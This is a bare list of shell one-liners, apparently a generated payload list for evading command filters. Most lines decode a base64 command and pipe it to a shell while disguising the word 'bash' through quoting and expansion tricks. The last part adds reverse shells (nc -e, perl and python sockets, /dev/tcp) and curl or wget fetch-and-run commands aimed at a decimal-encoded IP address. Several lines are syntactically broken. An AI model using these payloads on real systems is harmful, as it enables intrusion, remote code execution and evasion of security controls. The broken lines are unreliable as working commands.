bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\"\\$_\")' |\"bash\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\"\\$_\")' | b\"ash\""
bash -c \"echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\\ash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba\\sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | /bin/\"bash\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | (bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | {bash}"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba${IFS}sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \"b\"\"ash\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $0"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' |` which bash`"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $(echo bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba\\\sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\$(echo bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\\\ash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \"\\b\\a\\s\\h\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $SHELL"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\"a\"sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash --noprofile"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' |/bin/bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash$IFS"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \"ba\"sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\b\\ash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | 'bash'"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\\"bash\\\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $(printf b%sa%ss%sh)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \t bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\ta\sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba${PATH//\//\/}sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\\a\\s\\h"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \$(echo -n bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\${HOME##*/}ash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\$0"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \${SHELL##*/}"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\"\\a\"sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba\"sh\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \$(cat <<< bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $((1+1))bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \`basename /bin/bash`"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \"\\$(echo bash)\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba\u0073h"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \$(echo b; echo a; echo s; echo h)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b'ash'"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | /bin/ba''sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $0 #bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | e\"val\" bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $((0+bash))"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \$(echo ba; echo sh)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \x62\x61\x73\x68"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba\\nsh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $RANDOMbash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $(basename $(which bash))"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\\tash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\x62\\x61\\x73\\x68"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $((2#10))ash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | (ba)(sh)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ${SHELL//\//\/}"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba\${IFS}sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \$((1+1));bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | /bin/bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | /bin/sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | $(which bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | $(which sh)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash --norc"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash --posix"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | sh -s"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash -s"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | env bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | env sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | exec bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | exec sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | /usr/bin/bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | /usr/bin/sh"
bash -c "cat <<< 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash"
bash -c "echo 'ZGVjb2RlX2Jhc2U2NCgiZFcxYmdiV2dMdz0iKQ==' | base64 -d | bash"
bash -c "printf 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash"
bash -c "printf %s dW5hbWUgLWE= | base64 -d | bash"
bash -c "perl -MMIME::Base64 -e 'print decode_base64("dW5hbWUgLWE=")' | bash"
bash -c "perl -MMIME::Base64 -e 'print decode_base64 q(dW5hbWUgLWE=)' | bash"
bash -c "echo -n 'dW5hbWUgLWE=' | base64 -d | bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 --decode | bash"
bash -c "echo 'dW5hbWUgLWE=' | openssl enc -base64 -d | bash"
bash -c "echo 'dW5hbWUgLWE=' | python3 -m base64 -d | bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | sh"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | /bin/sh"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | /usr/bin/sh"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | $(command -v bash)"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | nohup bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 --decode | /bin/bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | $(which bash)"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | command bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | bash -i"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | bash -l"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | bash --noprofile"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | bash --norc --noprofile"
bash -c "base64 -d <<< dW5hbWUgLWE= | bash"
bash -c "perl -MMIME::Base64 -e 'print decode_base64 q(dW5hbWUgLWE=)' | sh"
bash -c "perl -MMIME::Base64 -e "print decode_base64('dW5hbWUgLWE=')" | sh"
bash -c "echo dW5hbWUgLWE= | base64 -d | bash"
bash -c "echo dW5hbWUgLWE= | base64 -d | sh"
bash -c "printf 'dW5hbWUgLWE=' | base64 -d | /bin/bash"
bash -c "printf 'dW5hbWUgLWE=' | base64 -d | exec bash"
bash -c "base64 -d <<<"dW5hbWUgLWE=" | exec bash"
bash -c "echo 'dW5hbWUgLWE=' | openssl base64 -d | bash"
bash -c "echo 'dW5hbWUgLWE=' | openssl enc -d -base64 | bash"
bash -c "base64 --decode <<< 'dW5hbWUgLWE=' | bash"
bash -c "cat <(echo 'dW5hbWUgLWE=') | base64 -d | bash"
bash -c "cat <(echo dW5hbWUgLWE=) | base64 -d | bash"
bash -c "bash <<< $(echo 'dW5hbWUgLWE=' | base64 -d)"
bash -c "bash -c $(echo 'ZWNobyAidW5hbWUgLWEiCg==' | base64 -d)"
bash -c "$(echo 'ZWNobyAidW5hbWUgLWEiCg==' | base64 -d)"
bash -c "$(perl -MMIME::Base64 -e 'print decode_base64("ZWNobyAidW5hbWUgLWEiCg==")')"
bash -c "$(echo dW5hbWUgLWE= | base64 -d)"
bash -c "`echo dW5hbWUgLWE= | base64 -d`"
bash -c "$(cat <<< 'dW5hbWUgLWE=' | base64 -d)"
bash -c "$(echo 'dW5hbWUgLWE=' | base64 --decode)"
bash -c "`perl -MMIME::Base64 -e 'print decode_base64(\"dW5hbWUgLWE=\")'`"
bash -c "$(perl -MMIME::Base64 -e 'print decode_base64("dW5hbWUgLWE=")')" | bash
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' |sh"
bash -c "echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)'|sh"
bash -c "echo 'dW5hbWUgLWE=' |perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"
bash -c "echo 'dW5hbWUgLWE='| perl -MMIME::Base64 -ne 'print decode_base64(\$_)'| bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"
bash -c "echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE='" | bash
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='"|bash"
bash -c "echo dW5hbWUgLWE=|base64 -d|bash"
bash -c "echo dW5hbWUgLWE=|base64 -d"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'" <<< 'dW5hbWUgLWE='
bash -c "echo dW5hbWUgLWE=|base64 -d|sh"
bash -c "echo dW5hbWUgLWE= | base64 -d"
bash -c "base64 -d <<< dW5hbWUgLWE= | bash"
bash -c "base64 -d<<<dW5hbWUgLWE=|bash"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='"
bash -c "echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"
bash -c "echo dW5hbWUgLWE= | base64 -d | sh"
bash -c "echo dW5hbWUgLWE=| base64 -d |bash"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"<<<'dW5hbWUgLWE='|bash
bash -c "echo dW5hbWUgLWE=|base64 -d|bash"
bash -c "echo dW5hbWUgLWE= | base64 -d|sh"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"<<<'dW5hbWUgLWE='
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='"|sh
bash -c "echo dW5hbWUgLWE=|base64 -d|sh"
bash -c "echo dW5hbWUgLWE=| base64 -d"
bash -c "base64 -d<<<dW5hbWUgLWE="|bash
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='"|sh
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='"
bash -c "echo dW5hbWUgLWE=|perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"
bash -c "echo dW5hbWUgLWE= |perl -MMIME::Base64 -ne 'print decode_base64(\$_)' |sh"
bash -c "echo dW5hbWUgLWE=|perl -MMIME::Base64 -ne 'print decode_base64(\$_)'|sh"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"<<<dW5hbWUgLWE=
bash -c "perl -MMIME::Base64 -ne'print decode_base64(\$_)'"<<<'dW5hbWUgLWE='|bash
bash -c "echo dW5hbWUgLWE=| base64 -d|sh"
bash -c "base64 -d<<<dW5hbWUgLWE="
bash -c "perl -MMIME::Base64 -ne'print decode_base64(\$_)'"<<<dW5hbWUgLWE=
bash -c "echo dW5hbWUgLWE=| base64 -d |sh"
bash -c "echo dW5hbWUgLWE= |base64 -d|sh"
bash -c "echo dW5hbWUgLWE=| base64 -d | bash"
bash -c "perl -MMIME::Base64 -ne'print decode_base64(\$_)'"<<<'dW5hbWUgLWE='|sh
bash -c "echo dW5hbWUgLWE= | base64 -d |sh"
bash -c "base64 -d <<< dW5hbWUgLWE="
bash -c "perl -MMIME::Base64 -ne'print decode_base64(\$_)'"<<<'dW5hbWUgLWE='
bash -c "base64 -d<<<'dW5hbWUgLWE='"|bash
bash -c "base64 -d<<<dW5hbWUgLWE="|sh
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"<<<'dW5hbWUgLWE='|sh"
bash -c "echo dW5hbWUgLWE=|base64 -d | sh"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<dW5hbWUgLWE="|sh"
bash -c "perl -MMIME::Base64 -ne'print decode_base64(\$_)'<<<dW5hbWUgLWE="
bash -c "echo dW5hbWUgLWE=|base64 -d| /bin/sh"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='" | /bin/sh"
bash -c "echo dW5hbWUgLWE=| base64 -d| /bin/bash"
bash -c "echo dW5hbWUgLWE=|base64 -d|/bin/bash"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='"|/bin/sh"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='"|/bin/bash"
bash -c "base64 -d<<<dW5hbWUgLWE=|/bin/sh"
bash -c "base64 -d<<<dW5hbWUgLWE="|/bin/bash"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<dW5hbWUgLWE="|sh"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash <<< \"dW5hbWUgLWE=\""
bash -c "bash < <(echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< \"dW5hbWUgLWE=\" | bash"
bash -c "echo dW5hbWUgLWE= | bash < <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "bash <<< \$(echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' < <(echo 'dW5hbWUgLWE=') | bash"
bash -c "bash <(echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash < <(echo 'dW5hbWUgLWE=')"
bash -c "bash <<< \$(perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< dW5hbWUgLWE= | bash"
bash -c "bash < <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=')"
bash -c "echo 'dW5hbWUgLWE=' | bash < <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash <<< dW5hbWUgLWE="
bash -c "bash <<< \$(perl -MMIME::Base64 -ne 'print decode_base64(\$_)' < <(echo 'dW5hbWUgLWE='))"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <(echo 'dW5hbWUgLWE=') | bash"
bash -c "bash <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)' < <(echo 'dW5hbWUgLWE='))"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash< <(echo 'dW5hbWUgLWE=')"
bash -c "bash<<<\$(echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<dW5hbWUgLWE=|bash"
bash -c "bash< <(echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'|bash<<<dW5hbWUgLWE="
bash -c "bash <(echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' < <(echo dW5hbWUgLWE=) | bash"
bash -c "bash<<<\$(perl -MMIME::Base64 -ne 'print decode_base64(\$_)'< <(echo dW5hbWUgLWE=))"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'|bash < <(echo dW5hbWUgLWE=)"
bash -c "bash < <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)'< <(echo dW5hbWUgLWE=))"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='|bash"
bash -c "bash<<<\$(echo dW5hbWUgLWE=|perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'< <(echo 'dW5hbWUgLWE=')|bash"
bash -c "bash <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE=')"
perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=' | bash -c
perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash -c <<< 'dW5hbWUgLWE='
bash -c | perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE='
bash <<< $(perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=') | bash -c
perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=' | bash | bash -c
bash -c "bash | perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE='"
bash | bash -c "perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE='"
bash <<< $(echo 'dW5hbWUgLWE=' | bash -c "perl -MMIME::Base64 -ne 'print decode_base64($_)'")
bash -c "bash | echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)'"
perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash <<< 'dW5hbWUgLWE=' | bash -c
perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=' | bash -c | bash
bash | perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=' | bash -c
echo 'dW5hbWUgLWE=' | bash -c | perl -MMIME::Base64 -ne 'print decode_base64($_)'
bash <<< $(perl -MMIME::Base64 -ne 'print decode_base64($_)' | echo 'dW5hbWUgLWE=')
bash <<< $(echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash)
perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash | echo 'dW5hbWUgLWE=' | bash -c
bash <<< $(perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash) | echo 'dW5hbWUgLWE='
bash -c | echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash
perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=' | bash -c | echo done
echo 'dW5hbWUgLWE=' | bash | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash -c
bash -c "perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash" <<< 'dW5hbWUgLWE='
bash | bash -c <<< $(perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=')
perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=' | bash | bash
bash -c "bash <<< $(perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=')"
bash <<< $(bash -c "perl -MMIME::Base64 -ne 'print decode_base64($_)'" <<< 'dW5hbWUgLWE=')
perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< $(echo 'dW5hbWUgLWE=') | bash -c
echo 'dW5hbWUgLWE=' | bash -c - | perl -MMIME::Base64 -ne 'print decode_base64($_)'
perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash -c <<< $(echo 'dW5hbWUgLWE=')
bash <<< $(echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash)
bash -c <<< $(perl -MMIME::Base64 -ne 'print decode_base64($_)' <<< 'dW5hbWUgLWE=') | bash
bash -c "echo 'address=2130706433' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash #2130706433"
bash -c "export ADDR=2130706433; echo \$ADDR | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash"
bash -c "perl -MMIME::Base64 -e 'print decode_base64(\"dW5hbWUgLWE=\")' | bash #address=2130706433"
bash -c "echo address=2130706433 > /tmp/.x && perl -MMIME::Base64 -ne 'print decode_base64(\$_)' < /tmp/.x | bash"
bash -c "curl http://2130706433/shell.sh | bash"
bash -c "wget -qO- http://2130706433/shell.sh | bash"
bash -c "ping -c1 2130706433 && echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash"
bash -c "nc 2130706433 80 -e /bin/bash"
bash -c "perl -e 'use Socket;$i=2130706433;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">\&S\");open(STDOUT,\">\&S\");open(STDERR,\">\&S\");exec(\"/bin/sh -i\");};'"
bash -c "python3 -c 'import socket,subprocess;s=socket.socket();s.connect((\"2130706433\",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];subprocess.call([\"/bin/sh\"])'"
bash -c "curl -s http://2130706433/payload | bash"
bash -c "echo 'address=2130706433' > /dev/null; echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash"
bash -c "printf 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash #2130706433"
bash -c "PERL5OPT=-MMIME::Base64 perl -ne 'print decode_base64(\"dW5hbWUgLWE=\")' | bash #127.0.0.1 recoded"
bash -c "host 2130706433 && perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=' | bash"
bash -c "perl -e 'print pack(\"N\", 2130706433)' | hexdump -C"
bash -c "base64 -d <<< 'dW5hbWUgLWE=' | bash #address=2130706433"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=' | bash #recoded IP"
bash -c "timeout 5 bash -i >& /dev/tcp/2130706433/443 0>&1"
bash -c "ip a | grep 2130706433; echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash"
bash -c "perl -e 'print inet_ntoa(pack(\"N\",2130706433))'"
bash -c "dig -x 2130706433 && perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=' | bash"
bash -c "nslookup 2130706433 && bash -c \$(echo dW5hbWUgLWE= | base64 -d)"
bash -c "eval \$(curl -s http://2130706433/init.sh)"
bash -c "host 2130706433 && bash -c \$(perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=')"
bash -c "dd if=/dev/tcp/2130706433/80 bs=1024 count=1 | bash"
bash -c "exec 3<>/dev/tcp/2130706433/80; echo GET / HTTP/1.1 >&3; cat <&3 | bash"
bash -c "PERL5OPT=-MMIME::Base64 perl -e 'print decode_base64(\"dW5hbWUgLWE=\")' | bash"
bash -c "$(curl http://2130706433/script.b64 | base64 -d)"
bash -c "PERL5OPT=-MMIME::Base64 perl -ne 'print decode_base64(\"dW5hbWUgLWE=\")' | bash #ip=2130706433"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64($_)' | bash #2130706433"
bash -c "curl --resolve localhost:80:2130706433 http://localhost/script.sh | bash"
bash -c "curl http://[2130706433]/payload.sh | bash"
bash -c "perl -e 'print scalar reverse(\"dW5hbWUgLWE=\")' | rev | base64 -d | bash"
bash -c "perl -MMIME::Base64 -e 'print decode_base64(\"dW5hbWUgLWE=\")' | bash #@2130706433"
bash -c "perl -e 'use Socket; print inet_ntoa(pack(\"N\",2130706433));'"
bash -c "IPINT=2130706433; echo \$IPINT | perl -ne 'print \"Using \$_.\\n\"'"
bash -c "read a <<< 2130706433 && echo \$a | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash"
bash -c "echo 'dW5hbWUgLWE=' > /tmp/.x && perl -MMIME::Base64 -ne 'print decode_base64(\$_)' /tmp/.x | bash"
bash -c "exec 5<>/dev/tcp/2130706433/8080; cat <&5 | bash"
bash -c "nc -n 2130706433 9999 | bash"
bash -c "curl -H 'Host: 2130706433' http://example.local/script.sh | bash"
bash -c "IP=2130706433 && curl http://\$IP/init.sh | bash"
bash -c "ping -c 1 2130706433 && bash -c \$(echo dW5hbWUgLWE= | base64 -d)"
bash -c "host -W 2 2130706433 && perl -MMIME::Base64 -ne 'print decode_base64(\"dW5hbWUgLWE=\")' | bash"
bash -c "printf 'dW5hbWUgLWE=' | base64 -d | bash #ip-int"
bash -c "dig +short -x 2130706433 && base64 -d <<< dW5hbWUgLWE= | bash"
bash -c "URL=http://2130706433/payload; wget -qO- \$URL | bash"
